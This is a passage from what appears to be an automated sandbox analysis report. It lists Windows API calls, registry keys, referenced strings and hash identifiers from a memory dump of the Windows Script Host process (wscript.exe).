                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058F2C6
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058F2CF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeString
                                                                                                                                                                                                                      • String ID: WScript_OnScriptTerminate$d@X
                                                                                                                                                                                                                      • API String ID: 3341692771-2954595149
                                                                                                                                                                                                                      • Opcode ID: d4716902e2d20ec83c8bdb15bd4bfdcc457b9629f35325eb69bbf45f528fa9a6
                                                                                                                                                                                                                      • Instruction ID: ac9391b6b9f32c5b93387600f5d780fcfb44caa42072f913119b7519dc5c3f47
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4716902e2d20ec83c8bdb15bd4bfdcc457b9629f35325eb69bbf45f528fa9a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23915D75A10205AFDB14EF98DC99AAE7BB6FF8C300F15016DEA02A7391DB30AD45CB54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00595846: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00588FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74,?,00000000,?,00000000), ref: 00595873
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000000,-00000001,0zX,005810C4), ref: 0058BDC4
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,-00000001,0zX,005810C4), ref: 0058BDD2
                                                                                                                                                                                                                        • Part of subcall function 00595C39: RegQueryValueExW.ADVAPI32(00000000,Enabled,00000000,?,?,?,00000000,00000000,Enabled), ref: 00595C99
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                      • String ID: 0zX$IgnoreUserSettings$Software\Microsoft\Windows Script Host\Settings$TrustPolicy$UseWINSAFER
                                                                                                                                                                                                                      • API String ID: 1607946009-882304179
                                                                                                                                                                                                                      • Opcode ID: ebb8c365e94966333767a69a21d49b44791b7a2c093aec07a6fb3825f374eca8
                                                                                                                                                                                                                      • Instruction ID: cb4518a703237d6f5db6119e8c648142cc23a6a2e969935be052d7029789ed92
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebb8c365e94966333767a69a21d49b44791b7a2c093aec07a6fb3825f374eca8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95315B74B0224ABBEF14EAA58495BEFBFBDBF95300B4840A99C41B7241D735EE058760
APIs
• RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00588FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74,?,00000000,?,00000000), ref: 00595873
• WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74), ref: 0059589D
• GetLastError.KERNEL32(?,00000000,00000000,00000000,?,0058BB74,?,00000000,?,00000000,?,?,?,00588FB7,00000000,00000000), ref: 005958AA
• __alloca_probe_16.LIBCMT ref: 005958B4
• WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,0058BB74,?,00000000,?,00000000), ref: 005958C8
• RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00588FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74,?,00000000,?,00000000), ref: 005958DF
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: ByteCharMultiOpenWide$ErrorLast__alloca_probe_16
• String ID: Software\Microsoft\Windows Script Host\Settings
• API String ID: 2927149995-2126348837
APIs
• RegCreateKeyExW.ADVAPI32(00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,?,005810C4,00000000,00000000,?,005921E8), ref: 00595933
• WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,-00000001,?,005810C4,00000000,00000000,?,005921E8,00020019), ref: 00595955
• GetLastError.KERNEL32(?,00000000,00000000,00000000,?,005921E8,00020019,00000000,0zX,?,?,?,0058AB73,80000002,0zX), ref: 00595961
• __alloca_probe_16.LIBCMT ref: 0059596B
• WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,005921E8,00020019,00000000,0zX,?,?), ref: 00595982
• RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,005921E8,00020019), ref: 0059599B
Similarity
• API ID: ByteCharCreateMultiWide$ErrorLast__alloca_probe_16
• String ID: Software\Microsoft\Windows Script Host\Settings
• API String ID: 3071801306-2126348837
APIs
Similarity
• API ID: String$AllocFree$freemalloc
• String ID:
• API String ID: 945414394-0
APIs
• SysFreeString.OLEAUT32(?), ref: 0058D6F1
• SysFreeString.OLEAUT32(?), ref: 0058D6FA
• SysFreeString.OLEAUT32(?), ref: 0058D703
• SysFreeString.OLEAUT32(?), ref: 0058D70C
• SysFreeString.OLEAUT32(?), ref: 0058D715
Strings
• WScript_OnScriptTerminate, xrefs: 0058D651
Similarity
• API ID: FreeString
• String ID: WScript_OnScriptTerminate
• API String ID: 3341692771-526745235
APIs
• CreateErrorInfo.OLEAUT32(00000A2C,?,?,?,?,005873FB,00583A24,WSHRemote.Execute,00000A2C), ref: 0058B1C7
• SetErrorInfo.OLEAUT32(00000000,?,?,?,?,?,005873FB,00583A24), ref: 0058B31A
• SysFreeString.OLEAUT32($:X), ref: 0058B36D
• SysFreeString.OLEAUT32(00000A2C), ref: 0058B376
  • Part of subcall function 0058B654: FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,?,00000A2C,00000000,0058B25F,?,?,?,?), ref: 0058B68F
  • Part of subcall function 0058B654: GetLastError.KERNEL32(?,00000A2C,00000000,0058B25F,?,?,?,?,?,005873FB,00583A24,WSHRemote.Execute,00000A2C), ref: 0058B69D
  • Part of subcall function 0058B654: LocalFree.KERNEL32(00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B774
  • Part of subcall function 0058B654: LocalFree.KERNEL32(00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B783
Similarity
• API ID: Free$Error$InfoLocalString$CreateFormatLastMessage
• String ID: $:X$$:X
• API String ID: 878232057-1527886810
APIs
• GetSystemDirectoryA.KERNEL32(?,00000000), ref: 0058C9B0
• GetLastError.KERNEL32 ref: 0058C9BC
Similarity
• API ID: DirectoryErrorLastSystem
• String ID:
• API String ID: 3081803543-0
APIs
• SafeArrayDestroy.OLEAUT32(00000000), ref: 00593158
• SysFreeString.OLEAUT32(?), ref: 005931A9
• SysFreeString.OLEAUT32(?), ref: 005931B2
• SysFreeString.OLEAUT32(?), ref: 005931BB
• SysFreeString.OLEAUT32(00000000), ref: 005931DE
• SysFreeString.OLEAUT32(00000000), ref: 005931ED
• free.MSVCRT ref: 005931F4
Similarity
• API ID: FreeString$ArrayDestroySafefree
• String ID:
• API String ID: 1006837209-0
APIs
  • Part of subcall function 00588028: _vsnprintf.MSVCRT ref: 0058805A
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?,Open2,?,?,?,Open2,00000000), ref: 0058A670
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0058A689
• RegCloseKey.ADVAPI32(?,?,Open2,?,?,Open2,00000000), ref: 0058A6C1
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: CloseCreateOpen_vsnprintf
• String ID: Open2$SOFTWARE\Classes\%s\%s$Shell
• API String ID: 476925587-1376022265
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383},00000000,00000001,?,?), ref: 0059711A
• RegQueryValueExW.ADVAPI32(?,Locale,00000000,00000000,?,00000006,00000000), ref: 00597137
• RegCloseKey.ADVAPI32(?), ref: 00597142
• _wcsnicmp.MSVCRT ref: 0059715A
Strings
• Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 00597110
• Locale, xrefs: 0059712F
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: CloseOpenQueryValue_wcsnicmp
• String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
• API String ID: 2262609651-1161606707
APIs
• GetTickCount.KERNEL32 ref: 005904FE
• _ftol2.MSVCRT ref: 00590548
• MsgWaitForMultipleObjectsEx.USER32(00000000,00000000,00000000,00001DFF,00000004), ref: 0059055D
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0059056D
• DispatchMessageA.USER32(?), ref: 0059057C
• GetTickCount.KERNEL32 ref: 00590594
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: CountMessageTick$DispatchMultipleObjectsPeekWait_ftol2
• String ID:
• API String ID: 4281434459-0
APIs
• VariantInit.OLEAUT32(?), ref: 005945B6
• SafeArrayGetElement.OLEAUT32(?,?,?), ref: 00594606
• SysStringLen.OLEAUT32(?), ref: 00594617
• SysStringLen.OLEAUT32(?), ref: 00594622
• VariantClear.OLEAUT32(?), ref: 00594645
• VariantClear.OLEAUT32(?), ref: 0059467B
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: Variant$ClearString$ArrayElementInitSafe
• String ID:
• API String ID: 598207039-0
APIs
• CreateFileW.KERNEL32(00589D3D,80000000,00000001,00000000,00000003,08000000,00000000,00000000,005810C4,00000000,000000FF,000000FF,?,00589D3D,00592FD0), ref: 0059615C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00589D3D,000000FF,00000000,00000000,00000000,00000000,00000000,005810C4,00000000,000000FF,000000FF,?,00589D3D,00592FD0), ref: 0059616E
• GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00589D3D,00592FD0,?,?,?,00000000,005810C4), ref: 0059617A
• __alloca_probe_16.LIBCMT ref: 0059618E
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: ByteCharCreateErrorFileLastMultiWide__alloca_probe_16
• String ID:
• API String ID: 2439737388-0
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID:
• String ID: -$/$cscript$wscript
• API String ID: 0-2169273652
APIs
• CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,00000000,00000000,?,00000000,00000000,?,005975C3,00000000), ref: 00596E10
• CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,005975C3,00000000), ref: 00596E24
• CloseHandle.KERNEL32(00000000,?,005975C3,00000000), ref: 00596E2D
• MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,005975C3,00000000), ref: 00596E3D
• CloseHandle.KERNEL32(00000000,?,005975C3,00000000), ref: 00596E46
• LoadLibraryExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,005975C3,00000000), ref: 00596E67
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: File$CloseCreateHandle$LibraryLoadMappingView
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1262414356-0
                                                                                                                                                                                                                      • Opcode ID: 77cebc9aa3c3fa1cb030c7266d2cda7436e35d774b73db5b073cbe3040abc0b8
                                                                                                                                                                                                                      • Instruction ID: 552c91c67a348be931f834b8bf39a4609e7743e476dfcabdc8d3b1ac5129e63e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77cebc9aa3c3fa1cb030c7266d2cda7436e35d774b73db5b073cbe3040abc0b8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A70126F66002187FFF201739AC8CF7B6A1CF799FE9F164529FA1192190D5628C18A170
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy_s$FreeString
                                                                                                                                                                                                                      • String ID: 0zX$WSH
                                                                                                                                                                                                                      • API String ID: 4021863947-954669032
                                                                                                                                                                                                                      • Opcode ID: 566d15f9bfb39b699bac8223e32ccdd00326339a950bd1156281931eb32359f2
                                                                                                                                                                                                                      • Instruction ID: c200a2deb9aa6bdf8445d7fa061a150368d133c7331d109660f47178fd042fe3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 566d15f9bfb39b699bac8223e32ccdd00326339a950bd1156281931eb32359f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B512A75600205ABCF24AF28DC89ABD7BB6FF84304F15045EE41AD7391DE309D45CB95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
                                                                                                                                                                                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00594765
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 005947A4
                                                                                                                                                                                                                      • SafeArrayPutElement.OLEAUT32(?,14Y0,,?), ref: 005947BC
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005947C8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ArraySafe$AllocClearCreateElementStringVariantmalloc
                                                                                                                                                                                                                      • String ID: 14Y0,
                                                                                                                                                                                                                      • API String ID: 90143694-2883143410
                                                                                                                                                                                                                      • Opcode ID: 9e1883860893939ed6cf8e336b3897dcbda4e7c4d9fffcd240ebdbb183cdba98
                                                                                                                                                                                                                      • Instruction ID: 4e485eca28b89367e516c4170967e889521782a4165fabfd7fe9525aaada4d3b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e1883860893939ed6cf8e336b3897dcbda4e7c4d9fffcd240ebdbb183cdba98
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0418D76A0161AABCF10DF98D885AAEBFB8FF49710F11452EE941A7240D7709D42CF90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,?,?,?,00000000,00000000,?,?,?,?,0058809D,00000000,00000000), ref: 0058BC93
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,?,?,?,00000000,00000000,?,?,?,?,0058809D,00000000), ref: 0058BCA2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                      • String ID: Enabled$Remote$Software\Microsoft\Windows Script Host\Settings
                                                                                                                                                                                                                      • API String ID: 3535843008-3078226056
                                                                                                                                                                                                                      • Opcode ID: 5b9c5023dfc2852b4d1f8eab6711c8fc7d374a3398b521cd45b71072fb1889bd
                                                                                                                                                                                                                      • Instruction ID: fc5585d0b3cba388d38b68a64883c132bad2febd4b7a7982e9b78ca3d38ef964
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b9c5023dfc2852b4d1f8eab6711c8fc7d374a3398b521cd45b71072fb1889bd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB11B2B1A10106ABEF11AB85D809BAE7E7EFFC0700F2400A9BC0177251CB705E45EB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 005880C5
                                                                                                                                                                                                                      • CoRegisterClassObject.OLE32(00583A14,00000000,00000014,00000000,?,00000000,00000000,?,?,?,00589188,000000FF,000000FF,000000FF), ref: 005880ED
                                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0058814D
                                                                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0058815A
                                                                                                                                                                                                                      • CoRevokeClassObject.OLE32(?,?,?,00589188,000000FF,000000FF,000000FF,?,?,00000000), ref: 00588167
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassMessageObject$CurrentDispatchRegisterRevokeThreadmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2658232301-0
                                                                                                                                                                                                                      • Opcode ID: 71827732d60e2f1ec6682d26e6d3c11aac84cc6aea8b4f14020559fa26d9fd45
                                                                                                                                                                                                                      • Instruction ID: e1a0d3dca58f10d23e432f816a4e6061450cd5d921c1fe46b6390424c542d5d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71827732d60e2f1ec6682d26e6d3c11aac84cc6aea8b4f14020559fa26d9fd45
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95319075600215EBCB10AF69CC4C9AEBEB8FF88310F55445AEA01B7250CF35DC06DB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,005810C4,005810C4,?,00000000,005810C4), ref: 00595A08
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00595A52
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,?,005810C4,005810C4,?,00000000,005810C4), ref: 00595A6A
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000001,?,?,?,?,005810C4,005810C4,?), ref: 00595A9C
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,000000FF,00000001,?,?,?,?,005810C4,005810C4,?), ref: 00595AA6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue$ByteCharErrorLastMultiWide__alloca_probe_16
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3112009249-0
                                                                                                                                                                                                                      • Opcode ID: ff08bc05cff4751948a31ef900668d2c87c5bd5a5dac172349e5feb3c5cef734
                                                                                                                                                                                                                      • Instruction ID: 3aebad679afb3b41fed41c15950cacb50c7b87517458b2c20f39de813b7c0fc6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff08bc05cff4751948a31ef900668d2c87c5bd5a5dac172349e5feb3c5cef734
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8931E231A00919BFCF228B6A8C8CAEF7FB8FF05325F50825AF515D6150E6349964CBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0058FE04
                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,005810C4,00000001,005810C4,?,005894FA,00000001,00581314,-00000001,0zX,005810C4), ref: 0058FE26
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,005894FA,00000001,00581314,-00000001,0zX,005810C4), ref: 0058FE33
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0058FEB0,00000000,00000000,00000014), ref: 0058FE57
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005894FA,00000001,00581314,-00000001,0zX,005810C4), ref: 0058FE71
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateThread$CloseCurrentErrorEventHandleLastmalloc
                                                                                                                                                                                                                      • String ID:
APIs
  • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
  • Part of subcall function 005951D4: GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951E5
  • Part of subcall function 005951D4: HeapFree.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951EC
  • Part of subcall function 005951D4: GetProcessHeap.KERNEL32(00000000,005810C4,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 0059520B
  • Part of subcall function 005951D4: HeapAlloc.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 00595212
• CLSIDFromString.OLE32(00589571,?,00001000,00000000,005810C4,005810C4), ref: 0058EA00
• CoCreateInstance.OLE32(?,00000000,00000017,00583860,00000000), ref: 0058EA21
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: Heap$Process$AllocCreateFreeFromInstanceStringmalloc
• String ID: WSH$WScript
APIs
  • Part of subcall function 00595901: RegCreateKeyExW.ADVAPI32(00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,?,005810C4,00000000,00000000,?,005921E8), ref: 00595933
  • Part of subcall function 00595AB3: RegQueryValueExW.ADVAPI32(00000000,TrustPolicy,00000000,-00000001,00000004,00000004,TrustPolicy,005810C4,00000000,005810C4,00000000,-00000001), ref: 00595AEE
• RegCloseKey.ADVAPI32(00000000,?,00000000,-00000001,00020019,00000000,0zX,?,?,?,0058AB73,80000002,0zX), ref: 00592258
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: CloseCreateQueryValue
• String ID: 0zX$DisplayLogo$Timeout
APIs
• bsearch.MSVCRT ref: 0059784F
• SetLastError.KERNEL32(00000057,?,?,00597692), ref: 0059785E
• SetLastError.KERNEL32(0000007A,?,?,?,?,?,00597692), ref: 00597895
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: ErrorLast$bsearch
• String ID: FX
APIs
• RegOpenKeyExA.ADVAPI32(00000000,Shell,00000000,00020006,?,00000000,00000000,?,0058A758,?,Open2,?,0058A8DE,00000000), ref: 0058A5BA
• RegSetValueExA.ADVAPI32(?,00583DC0,00000000,00000001,0058A758,00000001,?,0058A758,?,Open2,?,0058A8DE,00000000), ref: 0058A5F0
• RegCloseKey.ADVAPI32(?,?,0058A758,?,Open2,?,0058A8DE,00000000), ref: 0058A5FB
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: CloseOpenValue
• String ID: Shell
APIs
  • Part of subcall function 00595901: RegCreateKeyExW.ADVAPI32(00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,?,005810C4,00000000,00000000,?,005921E8), ref: 00595933
• RegCloseKey.ADVAPI32(00000000,00000000,0zX,00020006,00000000,-00000001,?,?,0058AD26,?,80000001,80000002,0zX), ref: 005922C5
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: CloseCreate
• String ID: 0zX$DisplayLogo$Timeout
APIs
• GetProcessHeap.KERNEL32(00000000,00593068,00589625,00000064,00589624,?,00593030,00593068,?,0058EC8A,?,00589624,?,P0Y,005810C4,00593030), ref: 005952BF
• HeapReAlloc.KERNEL32(00000000,?,0058EC8A,?,00589624,?,P0Y,005810C4,00593030,?,00589862,00000000,?,?,00589624,?), ref: 005952C6
• memcpy.MSVCRT(00003790,?,00589624,00589624,?,00593030,00593068,?,0058EC8A,?,00589624,?,P0Y,005810C4,00593030), ref: 00595301
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: Heap$AllocProcessmemcpy
• String ID: d
APIs
• SysFreeString.OLEAUT32(?), ref: 005862EE
• SysFreeString.OLEAUT32(?), ref: 005862F7
• SysFreeString.OLEAUT32(?), ref: 00586300
• DeleteCriticalSection.KERNEL32(?,?,?,?,0058646A), ref: 0058637A
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: FreeString$CriticalDeleteSection
• String ID:
                                                                                                                                                                                                                      • API String ID: 178840971-0
APIs
• LoadStringW.USER32(?,?,00000800,00000000), ref: 00595055
• LoadStringA.USER32(?,?,00000800,00000000), ref: 00595071
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000800,?,?,00000800,00000000,00000000,00000000,?,0058BAA2,?,?), ref: 0059508E
• SysAllocString.OLEAUT32(?), ref: 005950A1
Memory Dump Source
